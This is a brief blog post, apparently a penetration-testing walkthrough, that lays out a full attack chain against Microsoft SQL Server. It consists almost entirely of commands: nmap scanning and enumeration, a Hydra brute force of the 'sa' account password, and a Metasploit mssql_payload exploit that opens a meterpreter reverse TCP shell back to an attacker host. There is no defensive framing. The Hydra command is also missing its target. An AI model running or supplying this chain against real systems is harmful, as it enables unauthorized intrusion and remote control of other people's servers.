First confirm if MS SQL Server is running on the default port.
# nmap -Pn -sS -p 1433 192.168.0.25
After that, try to ascentain the details of the MS SQL Server.
# nmap -v -p 1433 --script=ms-sql-info 192.168.0.25
Subsequent to having the details regardin the authentication means, Hydra could be utilized to brute force the password.
# hydra -s 1433 -l sa -P /usr/share/wordlists/sqlmap.txt
Through Metasploit, let us complete the final step of the exploitation.
# msfconsole
msf > use exploit/windows/mssql/mssql_payload
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST XXX.XXX.XXX.XXX
msf > set RHOST XXX.XXX.XXX.XXX
msf > set USERNAME sa
msf > set PASSWORD XXXXX
msf > run
No comments:
Post a Comment